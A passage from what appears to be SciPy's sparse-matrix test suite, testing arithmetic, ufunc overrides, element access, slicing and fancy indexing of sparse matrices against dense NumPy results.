assert_array_equal(dsp.dot(csp).A, np.dot(d, c).A)
assert_array_equal(fsp.dot(esp).A, np.dot(f, e).A)
# bad matrix products
assert_raises(ValueError, dsp.dot, e)
assert_raises(ValueError, asp.dot, d)
# elemente-wise multiplication
assert_array_equal(asp.multiply(asp).A, np.multiply(a, a).A)
assert_array_equal(bsp.multiply(bsp).A, np.multiply(b, b).A)
assert_array_equal(dsp.multiply(dsp).A, np.multiply(d, d).A)
assert_array_equal(asp.multiply(a).A, np.multiply(a, a).A)
assert_array_equal(bsp.multiply(b).A, np.multiply(b, b).A)
assert_array_equal(dsp.multiply(d).A, np.multiply(d, d).A)
assert_array_equal(asp.multiply(6).A, np.multiply(a, 6).A)
assert_array_equal(bsp.multiply(6).A, np.multiply(b, 6).A)
assert_array_equal(dsp.multiply(6).A, np.multiply(d, 6).A)
# bad element-wise multiplication
assert_raises(ValueError, asp.multiply, c)
assert_raises(ValueError, esp.multiply, c)
# Addition
assert_array_equal(asp.__add__(asp).A, a.__add__(a).A)
assert_array_equal(bsp.__add__(bsp).A, b.__add__(b).A)
assert_array_equal(dsp.__add__(dsp).A, d.__add__(d).A)
# bad addition
assert_raises(ValueError, asp.__add__, dsp)
assert_raises(ValueError, bsp.__add__, asp)
def test_size_zero_conversions(self):
mat = np.matrix([])
a = mat.reshape((0, 0))
b = mat.reshape((0, 5))
c = mat.reshape((5, 0))
for m in [a, b, c]:
spm = self.spmatrix(m)
assert_array_equal(spm.tocoo().A, m)
assert_array_equal(spm.tocsr().A, m)
assert_array_equal(spm.tocsc().A, m)
assert_array_equal(spm.tolil().A, m)
assert_array_equal(spm.todok().A, m)
assert_array_equal(spm.tobsr().A, m)
def test_unary_ufunc_overrides(self):
def check(name):
if not HAS_NUMPY_UFUNC:
if name == "sign":
raise nose.SkipTest("sign conflicts with comparison op "
"support on Numpy without __numpy_ufunc__")
if self.spmatrix in (dok_matrix, lil_matrix):
raise nose.SkipTest("Unary ops not implemented for dok/lil "
"with Numpy without __numpy_ufunc__")
ufunc = getattr(np, name)
X = self.spmatrix(np.arange(20).reshape(4, 5) / 20.)
X0 = ufunc(X.toarray())
X2 = ufunc(X)
assert_array_equal(X2.toarray(), X0)
if HAS_NUMPY_UFUNC:
# the out argument doesn't work on Numpy without __numpy_ufunc__
out = np.zeros_like(X0)
X3 = ufunc(X, out=out)
assert_(X3 is out)
assert_array_equal(todense(X3), ufunc(todense(X)))
out = csc_matrix(out.shape, dtype=out.dtype)
out[:,1] = 999
X4 = ufunc(X, out=out)
assert_(X4 is out)
assert_array_equal(todense(X4), ufunc(todense(X)))
for name in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt",
"abs"]:
yield check, name
def test_binary_ufunc_overrides(self):
# data
a = np.array([[1, 2, 3],
[4, 5, 0],
[7, 8, 9]])
b = np.array([[9, 8, 7],
[6, 0, 0],
[3, 2, 1]])
c = 1.0
d = 1 + 2j
e = 5
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
a_items = dict(dense=a, scalar=c, cplx_scalar=d, int_scalar=e, sparse=asp)
b_items = dict(dense=b, scalar=c, cplx_scalar=d, int_scalar=e, sparse=bsp)
@dec.skipif(not HAS_NUMPY_UFUNC, "feature requires Numpy with __numpy_ufunc__")
def check(i, j, dtype):
ax = a_items[i]
bx = b_items[j]
if issparse(ax):
ax = ax.astype(dtype)
if issparse(bx):
bx = bx.astype(dtype)
a = todense(ax)
b = todense(bx)
def check_one(ufunc, allclose=False):
# without out argument
expected = ufunc(a, b)
got = ufunc(ax, bx)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
# with out argument
out = np.zeros(got.shape, dtype=got.dtype)
out.fill(np.nan)
got = ufunc(ax, bx, out=out)
assert_(got is out)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
out = csr_matrix(got.shape, dtype=out.dtype)
out[0,:] = 999
got = ufunc(ax, bx, out=out)
assert_(got is out)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
# -- associative
# multiply
check_one(np.multiply)
# add
if isscalarlike(ax) or isscalarlike(bx):
try:
check_one(np.add)
except NotImplementedError:
# Not implemented for all spmatrix types
pass
else:
check_one(np.add)
# maximum
check_one(np.maximum)
# minimum
check_one(np.minimum)
# -- non-associative
# dot
check_one(np.dot)
# subtract
if isscalarlike(ax) or isscalarlike(bx):
try:
check_one(np.subtract)
except NotImplementedError:
# Not implemented for all spmatrix types
pass
else:
check_one(np.subtract)
# divide
with np.errstate(divide='ignore', invalid='ignore'):
if isscalarlike(bx):
# Rounding error may be different, as the sparse implementation
# computes a/b -> a * (1/b) if b is a scalar
check_one(np.divide, allclose=True)
else:
check_one(np.divide)
# true_divide
if isscalarlike(bx):
check_one(np.true_divide, allclose=True)
else:
check_one(np.true_divide)
for i in a_items.keys():
for j in b_items.keys():
for dtype in [np.int_, np.float_, np.complex_]:
if i == 'sparse' or j == 'sparse':
yield check, i, j, dtype
@dec.skipif(not HAS_NUMPY_UFUNC, "feature requires Numpy with __numpy_ufunc__")
def test_ufunc_object_array(self):
# This tests compatibility with previous Numpy object array
# ufunc behavior. See gh-3345.
a = self.spmatrix([[1, 2]])
b = self.spmatrix([[3], [4]])
c = self.spmatrix([[5], [6]])
# Should distribute the operation across the object array
d = np.multiply(a, np.array([[b], [c]]))
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (a*b).A)
assert_allclose(d[1,0].A, (a*c).A)
# Lists also get cast to object arrays
d = np.multiply(a, [[b], [c]])
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (a*b).A)
assert_allclose(d[1,0].A, (a*c).A)
# This returned NotImplemented in Numpy < 1.9; do it properly now
d = np.multiply(np.array([[b], [c]]), a)
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (b*a).A)
assert_allclose(d[1,0].A, (c*a).A)
d = np.subtract(np.array(b, dtype=object), c)
assert_(isinstance(d, sparse.spmatrix))
assert_allclose(d.A, (b - c).A)
class _TestInplaceArithmetic:
def test_inplace_dense(self):
a = np.ones((3, 4))
b = self.spmatrix(a)
with warnings.catch_warnings():
if not HAS_NUMPY_UFUNC:
warnings.simplefilter("ignore", DeprecationWarning)
x = a.copy()
y = a.copy()
x += a
y += b
assert_array_equal(x, y)
x = a.copy()
y = a.copy()
x -= a
y -= b
assert_array_equal(x, y)
# This is matrix product, from __rmul__
assert_raises(ValueError, operator.imul, x, b)
x = a.copy()
y = a.copy()
x = x.dot(a.T)
y *= b.T
assert_array_equal(x, y)
# Matrix (non-elementwise) floor division is not defined
assert_raises(TypeError, operator.ifloordiv, x, b)
def test_imul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Avoid implicit casting.
if np.can_cast(type(2), dtype, casting='same_kind'):
a = datsp.copy()
a *= 2
b = dat.copy()
b *= 2
assert_array_equal(b, a.todense())
if np.can_cast(type(17.3), dtype, casting='same_kind'):
a = datsp.copy()
a *= 17.3
b = dat.copy()
b *= 17.3
assert_array_equal(b, a.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_idiv_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
if np.can_cast(type(2), dtype, casting='same_kind'):
a = datsp.copy()
a /= 2
b = dat.copy()
b /= 2
assert_array_equal(b, a.todense())
if np.can_cast(type(17.3), dtype, casting='same_kind'):
a = datsp.copy()
a /= 17.3
b = dat.copy()
b /= 17.3
assert_array_equal(b, a.todense())
for dtype in self.checked_dtypes:
# /= should only be used with float dtypes to avoid implicit
# casting.
if not np.can_cast(dtype, np.int_):
yield check, dtype
def test_inplace_success(self):
# Inplace ops should work even if a specialized version is not
# implemented, falling back to x = x <op> y
a = self.spmatrix(np.eye(5))
b = self.spmatrix(np.eye(5))
bp = self.spmatrix(np.eye(5))
b += a
bp = bp + a
assert_allclose(b.A, bp.A)
b *= a
bp = bp * a
assert_allclose(b.A, bp.A)
b -= a
bp = bp - a
assert_allclose(b.A, bp.A)
assert_raises(TypeError, operator.ifloordiv, a, b)
class _TestGetSet:
def test_getelement(self):
def check(dtype):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
D = array([[1,0,0],
[4,3,0],
[0,2,0],
[0,0,0]], dtype=dtype)
A = self.spmatrix(D)
M,N = D.shape
for i in range(-M, M):
for j in range(-N, N):
assert_equal(A[i,j], D[i,j])
for ij in [(0,3),(-1,3),(4,0),(4,3),(4,-1), (1, 2, 3)]:
assert_raises((IndexError, TypeError), A.__getitem__, ij)
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_setelement(self):
def check(dtype):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((3,4), dtype=dtype)
A[0, 0] = dtype.type(0) # bug 870
A[1, 2] = dtype.type(4.0)
A[0, 1] = dtype.type(3)
A[2, 0] = dtype.type(2.0)
A[0,-1] = dtype.type(8)
A[-1,-2] = dtype.type(7)
A[0, 1] = dtype.type(5)
if dtype != np.bool_:
assert_array_equal(A.todense(),[[0,5,0,8],[0,0,4,0],[2,0,7,0]])
for ij in [(0,4),(-1,4),(3,0),(3,4),(3,-1)]:
assert_raises(IndexError, A.__setitem__, ij, 123.0)
for v in [[1,2,3], array([1,2,3])]:
assert_raises(ValueError, A.__setitem__, (0,0), v)
if (not np.issubdtype(dtype, np.complexfloating) and
dtype != np.bool_):
for v in [3j]:
assert_raises(TypeError, A.__setitem__, (0,0), v)
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_negative_index_assignment(self):
# Regression test for github issue 4428.
def check(dtype):
A = self.spmatrix((3, 10), dtype=dtype)
A[0, -4] = 1
assert_equal(A[0, -4], 1)
for dtype in self.checked_dtypes:
yield check, np.dtype(dtype)
def test_scalar_assign_2(self):
n, m = (5, 10)
def _test_set(i, j, nitems):
msg = "%r ; %r ; %r" % (i, j, nitems)
A = self.spmatrix((n, m))
A[i, j] = 1
assert_almost_equal(A.sum(), nitems, err_msg=msg)
assert_almost_equal(A[i, j], 1, err_msg=msg)
# [i,j]
for i, j in [(2, 3), (-1, 8), (-1, -2), (array(-1), -2), (-1, array(-2)),
(array(-1), array(-2))]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
_test_set(i, j, 1)
def test_index_scalar_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5, 5))
B = np.zeros((5, 5))
for C in [A, B]:
C[0,1] = 1
C[3,0] = 4
C[3,0] = 9
assert_array_equal(A.toarray(), B)
class _TestSolve:
def test_solve(self):
# Test whether the lu_solve command segfaults, as reported by Nils
# Wagner for a 64-bit machine, 02 March 2005 (EJS)
n = 20
np.random.seed(0) # make tests repeatable
A = zeros((n,n), dtype=complex)
x = np.random.rand(n)
y = np.random.rand(n-1)+1j*np.random.rand(n-1)
r = np.random.rand(n)
for i in range(len(x)):
A[i,i] = x[i]
for i in range(len(y)):
A[i,i+1] = y[i]
A[i+1,i] = conjugate(y[i])
A = self.spmatrix(A)
x = splu(A).solve(r)
assert_almost_equal(A*x,r)
class _TestSlicing:
def test_dtype_preservation(self):
assert_equal(self.spmatrix((1,10), dtype=np.int16)[0,1:5].dtype, np.int16)
assert_equal(self.spmatrix((1,10), dtype=np.int32)[0,1:5].dtype, np.int32)
assert_equal(self.spmatrix((1,10), dtype=np.float32)[0,1:5].dtype, np.float32)
assert_equal(self.spmatrix((1,10), dtype=np.float64)[0,1:5].dtype, np.float64)
def test_get_horiz_slice(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[1,:], A[1,:].todense())
assert_array_equal(B[1,2:5], A[1,2:5].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1, 1:3], D[1, 1:3].todense())
# Now test slicing when a row contains only zeros
E = matrix([[1, 2, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1, 1:3], F[1, 1:3].todense())
assert_array_equal(E[2, -2:], F[2, -2:].A)
# The following should raise exceptions:
assert_raises(IndexError, A.__getitem__, (slice(None), 11))
assert_raises(IndexError, A.__getitem__, (6, slice(3, 7)))
def test_get_vert_slice(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[2:5,0], A[2:5,0].todense())
assert_array_equal(B[:,1], A[:,1].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1:3, 1], D[1:3, 1].todense())
assert_array_equal(C[:, 2], D[:, 2].todense())
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[:, 1], F[:, 1].todense())
assert_array_equal(E[-2:, 2], F[-2:, 2].todense())
# The following should raise exceptions:
assert_raises(IndexError, A.__getitem__, (slice(None), 11))
assert_raises(IndexError, A.__getitem__, (6, slice(3, 7)))
def test_get_slices(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(A[2:5,0:3].todense(), B[2:5,0:3])
assert_array_equal(A[1:,:-1].todense(), B[1:,:-1])
assert_array_equal(A[:-1,1:].todense(), B[:-1,1:])
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1:2, 1:2], F[1:2, 1:2].todense())
assert_array_equal(E[:, 1:], F[:, 1:].todense())
def test_non_unit_stride_2d_indexing(self):
# Regression test -- used to silently ignore the stride.
v0 = np.random.rand(50, 50)
try:
v = self.spmatrix(v0)[0:25:2, 2:30:3]
except ValueError:
# if unsupported
raise nose.SkipTest("feature not implemented")
assert_array_equal(v.todense(),
v0[0:25:2, 2:30:3])
def test_slicing_2(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
# [i,j]
assert_equal(A[2,3], B[2,3])
assert_equal(A[-1,8], B[-1,8])
assert_equal(A[-1,-2],B[-1,-2])
assert_equal(A[array(-1),-2],B[-1,-2])
assert_equal(A[-1,array(-2)],B[-1,-2])
assert_equal(A[array(-1),array(-2)],B[-1,-2])
# [i,1:2]
assert_equal(A[2,:].todense(), B[2,:])
assert_equal(A[2,5:-2].todense(),B[2,5:-2])
assert_equal(A[array(2),5:-2].todense(),B[2,5:-2])
# [1:2,j]
assert_equal(A[:,2].todense(), B[:,2])
assert_equal(A[3:4,9].todense(), B[3:4,9])
assert_equal(A[1:4,-5].todense(),B[1:4,-5])
assert_equal(A[2:-1,3].todense(),B[2:-1,3])
assert_equal(A[2:-1,array(3)].todense(),B[2:-1,3])
# [1:2,1:2]
assert_equal(A[1:2,1:2].todense(),B[1:2,1:2])
assert_equal(A[4:,3:].todense(), B[4:,3:])
assert_equal(A[:4,:5].todense(), B[:4,:5])
assert_equal(A[2:-1,:5].todense(),B[2:-1,:5])
# [i]
assert_equal(A[1,:].todense(), B[1,:])
assert_equal(A[-2,:].todense(),B[-2,:])
assert_equal(A[array(-2),:].todense(),B[-2,:])
# [1:2]
assert_equal(A[1:4].todense(), B[1:4])
assert_equal(A[1:-2].todense(),B[1:-2])
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_slicing_3(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
s_ = np.s_
slices = [s_[:2], s_[1:2], s_[3:], s_[3::2],
s_[8:3:-1], s_[4::-2], s_[:5:-1],
0, 1, s_[:], s_[1:5], -1, -2, -5,
array(-1), np.int8(-3)]
def check_1(a):
x = A[a]
y = B[a]
if y.shape == ():
assert_equal(x, y, repr(a))
else:
if x.size == 0 and y.size == 0:
pass
else:
assert_array_equal(x.todense(), y, repr(a))
for j, a in enumerate(slices):
yield check_1, a
def check_2(a, b):
# Indexing np.matrix with 0-d arrays seems to be broken,
# as they seem not to be treated as scalars.
# https://github.com/numpy/numpy/issues/3110
if isinstance(a, np.ndarray):
ai = int(a)
else:
ai = a
if isinstance(b, np.ndarray):
bi = int(b)
else:
bi = b
x = A[a, b]
y = B[ai, bi]
if y.shape == ():
assert_equal(x, y, repr((a, b)))
else:
if x.size == 0 and y.size == 0:
pass
else:
assert_array_equal(x.todense(), y, repr((a, b)))
for i, a in enumerate(slices):
for j, b in enumerate(slices):
yield check_2, a, b
def test_ellipsis_slicing(self):
b = asmatrix(arange(50).reshape(5,10))
a = self.spmatrix(b)
assert_array_equal(a[...].A, b[...].A)
assert_array_equal(a[...,].A, b[...,].A)
assert_array_equal(a[1, ...].A, b[1, ...].A)
assert_array_equal(a[..., 1].A, b[..., 1].A)
assert_array_equal(a[1:, ...].A, b[1:, ...].A)
assert_array_equal(a[..., 1:].A, b[..., 1:].A)
assert_array_equal(a[1:, 1, ...].A, b[1:, 1, ...].A)
assert_array_equal(a[1, ..., 1:].A, b[1, ..., 1:].A)
# These return ints
assert_equal(a[1, 1, ...], b[1, 1, ...])
assert_equal(a[1, ..., 1], b[1, ..., 1])
@dec.skipif(NumpyVersion(np.__version__) >= '1.9.0.dev')
def test_multiple_ellipsis_slicing(self):
b = asmatrix(arange(50).reshape(5,10))
a = self.spmatrix(b)
assert_array_equal(a[..., ...].A, b[..., ...].A)
assert_array_equal(a[..., ..., ...].A, b[..., ..., ...].A)
assert_array_equal(a[1, ..., ...].A, b[1, ..., ...].A)
assert_array_equal(a[1:, ..., ...].A, b[1:, ..., ...].A)
assert_array_equal(a[..., ..., 1:].A, b[..., ..., 1:].A)
# Bug in NumPy's slicing
assert_array_equal(a[..., ..., 1].A, b[..., ..., 1].A.reshape((5,1)))
class _TestSlicingAssign:
def test_slice_scalar_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5, 5))
B = np.zeros((5, 5))
for C in [A, B]:
C[0:1,1] = 1
C[3:0,0] = 4
C[3:4,0] = 9
C[0,4:] = 1
C[3::-1,4:] = 9
assert_array_equal(A.toarray(), B)
def test_slice_assign_2(self):
n, m = (5, 10)
def _test_set(i, j):
msg = "i=%r; j=%r" % (i, j)
A = self.spmatrix((n, m))
A[i, j] = 1
B = np.zeros((n, m))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B, err_msg=msg)
# [i,1:2]
for i, j in [(2, slice(3)), (2, slice(None, 10, 4)), (2, slice(5, -2)),
(array(2), slice(5, -2))]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
_test_set(i, j)
def test_self_self_assignment(self):
# Tests whether a row of one lil_matrix can be assigned to
# another.
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
B = self.spmatrix((4,3))
B[0,0] = 2
B[1,2] = 7
B[2,1] = 3
B[3,0] = 10
A = B / 10
B[0,:] = A[0,:]
assert_array_equal(A[0,:].A, B[0,:].A)
A = B / 10
B[:,:] = A[:1,:1]
assert_equal(A[0,0], B[3,2])
A = B / 10
B[:-1,0] = A[0,:].T
assert_array_equal(A[0,:].A.T, B[:-1,0].A)
def test_slice_assignment(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
B = self.spmatrix((4,3))
B[0,0] = 5
B[1,2] = 3
B[2,1] = 7
expected = array([[10,0,0],
[0,0,6],
[0,14,0],
[0,0,0]])
B[:,:] = B+B
assert_array_equal(B.todense(),expected)
block = [[1,0],[0,4]]
B[:2,:2] = csc_matrix(array(block))
assert_array_equal(B.todense()[:2,:2],block)
def test_set_slice(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5,10))
B = matrix(zeros((5,10), float))
s_ = np.s_
slices = [s_[:2], s_[1:2], s_[3:], s_[3::2],
s_[8:3:-1], s_[4::-2], s_[:5:-1],
0, 1, s_[:], s_[1:5], -1, -2, -5,
array(-1), np.int8(-3)]
for j, a in enumerate(slices):
A[a] = j
B[a] = j
assert_array_equal(A.todense(), B, repr(a))
for i, a in enumerate(slices):
for j, b in enumerate(slices):
A[a,b] = 10*i + 1000*(j+1)
B[a,b] = 10*i + 1000*(j+1)
assert_array_equal(A.todense(), B, repr((a, b)))
A[0, 1:10:2] = xrange(1,10,2)
B[0, 1:10:2] = xrange(1,10,2)
assert_array_equal(A.todense(), B)
A[1:5:2,0] = np.array(range(1,5,2))[:,None]
B[1:5:2,0] = np.array(range(1,5,2))[:,None]
assert_array_equal(A.todense(), B)
# The next commands should raise exceptions
assert_raises(ValueError, A.__setitem__, (0, 0), list(range(100)))
assert_raises(ValueError, A.__setitem__, (0, 0), arange(100))
assert_raises(ValueError, A.__setitem__, (0, slice(None)),
list(range(100)))
assert_raises(ValueError, A.__setitem__, (slice(None), 1),
list(range(100)))
assert_raises(ValueError, A.__setitem__, (slice(None), 1), A.copy())
assert_raises(ValueError, A.__setitem__,
([[1, 2, 3], [0, 3, 4]], [1, 2, 3]), [1, 2, 3, 4])
assert_raises(ValueError, A.__setitem__,
([[1, 2, 3], [0, 3, 4], [4, 1, 3]],
[[1, 2, 4], [0, 1, 3]]), [2, 3, 4])
class _TestFancyIndexing:
"""Tests fancy indexing features. The tests for any matrix formats
that implement these features should derive from this class.
"""
def test_bad_index(self):
A = self.spmatrix(np.zeros([5, 5]))
assert_raises((IndexError, ValueError, TypeError), A.__getitem__, "foo")
assert_raises((IndexError, ValueError, TypeError), A.__getitem__, (2, "foo"))
assert_raises((IndexError, ValueError), A.__getitem__,
([1, 2, 3], [1, 2, 3, 4]))
def test_fancy_indexing(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
# [i]
assert_equal(A[[1,3]].todense(), B[[1,3]])
# [i,[1,2]]
assert_equal(A[3,[1,3]].todense(), B[3,[1,3]])
assert_equal(A[-1,[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),[2,-5]].todense(),B[-1,[2,-5]])
assert_equal(A[-1,array([2,-5])].todense(),B[-1,[2,-5]])
assert_equal(A[array(-1),array([2,-5])].todense(),B[-1,[2,-5]])
# [1:2,[1,2]]
assert_equal(A[:,[2,8,3,-1]].todense(),B[:,[2,8,3,-1]])
assert_equal(A[3:4,[9]].todense(), B[3:4,[9]])
assert_equal(A[1:4,[-1,-5]].todense(), B[1:4,[-1,-5]])
assert_equal(A[1:4,array([-1,-5])].todense(), B[1:4,[-1,-5]])
# [[1,2],j]
assert_equal(A[[1,3],3].todense(), B[[1,3],3])
assert_equal(A[[2,-5],-4].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),-4].todense(), B[[2,-5],-4])
assert_equal(A[[2,-5],array(-4)].todense(), B[[2,-5],-4])
assert_equal(A[array([2,-5]),array(-4)].todense(), B[[2,-5],-4])
# [[1,2],1:2]
assert_equal(A[[1,3],:].todense(), B[[1,3],:])
assert_equal(A[[2,-5],8:-1].todense(),B[[2,-5],8:-1])
assert_equal(A[array([2,-5]),8:-1].todense(),B[[2,-5],8:-1])
# [[1,2],[1,2]]
assert_equal(todense(A[[1,3],[2,4]]), B[[1,3],[2,4]])
assert_equal(todense(A[[-1,-3],[2,-4]]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[array([-1,-3]),[2,-4]]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[[-1,-3],array([2,-4])]), B[[-1,-3],[2,-4]])
assert_equal(todense(A[array([-1,-3]),array([2,-4])]), B[[-1,-3],[2,-4]])
# [[[1],[2]],[1,2]]
assert_equal(A[[[1],[3]],[2,4]].todense(), B[[[1],[3]],[2,4]])
assert_equal(A[[[-1],[-3],[-2]],[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),[2,-4]].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[[[-1],[-3],[-2]],array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
assert_equal(A[array([[-1],[-3],[-2]]),array([2,-4])].todense(),B[[[-1],[-3],[-2]],[2,-4]])
# [[1,2]]
assert_equal(A[[1,3]].todense(), B[[1,3]])
assert_equal(A[[-1,-3]].todense(),B[[-1,-3]])
assert_equal(A[array([-1,-3])].todense(),B[[-1,-3]])
# [[1,2],:][:,[1,2]]
assert_equal(A[[1,3],:][:,[2,4]].todense(), B[[1,3],:][:,[2,4]])
assert_equal(A[[-1,-3],:][:,[2,-4]].todense(), B[[-1,-3],:][:,[2,-4]])
assert_equal(A[array([-1,-3]),:][:,array([2,-4])].todense(), B[[-1,-3],:][:,[2,-4]])
# [:,[1,2]][[1,2],:]
assert_equal(A[:,[1,3]][[2,4],:].todense(), B[:,[1,3]][[2,4],:])
assert_equal(A[:,[-1,-3]][[2,-4],:].todense(), B[:,[-1,-3]][[2,-4],:])
assert_equal(A[:,array([-1,-3])][array([2,-4]),:].todense(), B[:,[-1,-3]][[2,-4],:])
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_fancy_indexing_randomized(self):
np.random.seed(1234) # make runs repeatable
NUM_SAMPLES = 50
M = 6
N = 4
D = np.asmatrix(np.random.rand(M,N))
D = np.multiply(D, D > 0.5)
I = np.random.random_integers(-M + 1, M - 1, size=NUM_SAMPLES)
J = np.random.random_integers(-N + 1, N - 1, size=NUM_SAMPLES)
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
I_bad = I + M
J_bad = J - N
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
def test_fancy_indexing_boolean(self):
np.random.seed(1234) # make runs repeatable
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
I = np.array(np.random.randint(0, 2, size=5), dtype=bool)
J = np.array(np.random.randint(0, 2, size=10), dtype=bool)
X = np.array(np.random.randint(0, 2, size=(5, 10)), dtype=bool)
assert_equal(todense(A[I]), B[I])
assert_equal(todense(A[:,J]), B[:, J])
assert_equal(todense(A[X]), B[X])
assert_equal(todense(A[B > 9]), B[B > 9])
I = np.array([True, False, True, True, False])
J = np.array([False, True, True, False, True])
assert_equal(todense(A[I, J]), B[I, J])
Z1 = np.zeros((6, 11), dtype=bool)
Z2 = np.zeros((6, 11), dtype=bool)
Z2[0,-1] = True
Z3 = np.zeros((6, 11), dtype=bool)
Z3[-1,0] = True
assert_equal(A[Z1], np.array([]))
assert_raises(IndexError, A.__getitem__, Z2)
assert_raises(IndexError, A.__getitem__, Z3)
assert_raises((IndexError, ValueError), A.__getitem__, (X, 1))
def test_fancy_indexing_sparse_boolean(self):
np.random.seed(1234) # make runs repeatable
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
X = np.array(np.random.randint(0, 2, size=(5, 10)), dtype=bool)
Xsp = csr_matrix(X)
assert_equal(todense(A[Xsp]), B[X])
assert_equal(todense(A[A > 9]), B[B > 9])
Z = np.array(np.random.randint(0, 2, size=(5, 11)), dtype=bool)
Y = np.array(np.random.randint(0, 2, size=(6, 10)), dtype=bool)
Zsp = csr_matrix(Z)
Ysp = csr_matrix(Y)
assert_raises(IndexError, A.__getitem__, Zsp)
assert_raises(IndexError, A.__getitem__, Ysp)
assert_raises((IndexError, ValueError), A.__getitem__, (Xsp, 1))
def test_fancy_indexing_regression_3087(self):
mat = self.spmatrix(array([[1, 0, 0], [0,1,0], [1,0,0]]))
desired_cols = np.ravel(mat.sum(0)) > 0
assert_equal(mat[:, desired_cols].A, [[1, 0], [0, 1], [1, 0]])
def test_fancy_indexing_seq_assign(self):
mat = self.spmatrix(array([[1, 0], [0, 1]]))
assert_raises(ValueError, mat.__setitem__, (0, 0), np.array([1,2]))
def test_fancy_indexing_empty(self):
B = asmatrix(arange(50).reshape(5,10))
B[1,:] = 0
B[:,2] = 0
B[3,6] = 0
A = self.spmatrix(B)
K = np.array([False, False, False, False, False])
assert_equal(todense(A[K]), B[K])
K = np.array([], dtype=int)
assert_equal(todense(A[K]), B[K])
assert_equal(todense(A[K,K]), B[K,K])
J = np.array([0, 1, 2, 3, 4], dtype=int)[:,None]
assert_equal(todense(A[K,J]), B[K,J])
assert_equal(todense(A[J,K]), B[J,K])
@contextlib.contextmanager
def check_remains_sorted(X):
"""Checks that sorted indices property is retained through an operation
"""
if not hasattr(X, 'has_sorted_indices') or not X.has_sorted_indices:
yield
return
yield
indices = X.indices.copy()
X.has_sorted_indices = False
X.sort_indices()
assert_array_equal(indices, X.indices,
'Expected sorted indices, found unsorted')
class _TestFancyIndexingAssign:
def test_bad_index_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix(np.zeros([5, 5]))
